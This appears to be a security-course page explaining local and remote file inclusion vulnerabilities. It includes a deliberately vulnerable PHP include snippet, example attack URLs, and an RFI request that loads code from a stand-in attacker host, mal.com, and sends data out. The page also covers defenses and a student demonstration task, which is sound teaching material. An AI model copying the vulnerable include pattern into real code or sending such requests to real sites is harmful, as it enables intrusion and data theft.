File Inclusion

File Inclusion is a vulnerability that allows users to unsolicitedly import desired files, within or outside the web server, within a script and make the web application execute them. The inclusion procedure that is handled by the server-side script is taken advantage of due to improper validation of user-supplied input.

Attack Vector

There are two types of file inclusion vulnerabilities an attacker can exploit:

Local File Inclusion (LFI)

Web applications that include file names within URL parameters (http://….file=file1.php&…) can give away which parameters are responsible for executing files. If user inputs are not properly validated and sanitized by the server, attackers are able to search for script that exist locally within the web root (via directory traversal), and execute them (http://….file=return_password.php&…).

Remote File Inclusion (RFI)

Even if a web application does not allow code execution, its system may be vulnerable to RFI. In this case, an attacker would use the web application as a jump-off point to run their own code that is hosted on their own machine. An RFI attack is possible if the server-side script of a website includes external files based on the inputs passed to the URL parameter.

Impact

The impacts of exploiting an LFI vulnerability may consist of displaying sensitive information or granting authorization access to a malicious user. While the severity of an LFI attack would vary depending on the scripts that are locally available, exploiting an RFI vulnerability may lead to a wider spectrum of critical attacks, including XSS and Clickjacking, as the attacker would essentially have full control over the executed code.

Attack Examples

Example 1- Local File Inclusion

Suppose Mallory is visiting her friend’s personal blog website http://alice-blogs.com that uses the following index.php code to fetch different pages:

$page = $_GET[‘page’];
include('directory/' . $page);

Mallory notices that each page is queried in the following URL format: http://alice-blogs.com/?page=page1.php. She also remembers that she had successfully convinced Alice to download her malicious file mal.php inside/directory. Mallory then proceeds to execute her code by simply searching http://alice-blogs.com/?page=mal.php.

Example 2- RFI

Alice eventually finds out about the malicious script in her computer, which she promptly deletes. Mallory decides to host her own server and runs her malicious code there at http://mal.com/mal.php. Because Alice did not update her vulnerable php code, Mallory is able to send the request http://alice-blogs.com/?page=http://mal.com/mal.php, which causes Alice’s website to send over personal information to Mallory.

Defenses

Similar to defending against path sanitization bypasses, the best way to prevent file inclusion vulnerabilities is by not allowing arbitrary user input data to request for files, inside or outside the system. If this is not feasible, due to certain API constraints, the next best option is to validate user-inputs thoroughly and keep a safelist of files that users have access to.

Criteria for Demonstration

Provide the scripts, either existing locally in the web server or in a remote server, that you were able to include and run via the web application. Also, provide the exact steps you took to include the unsolicited files, and explain the the unauthorized actions you were able to execute.

Resources


knambara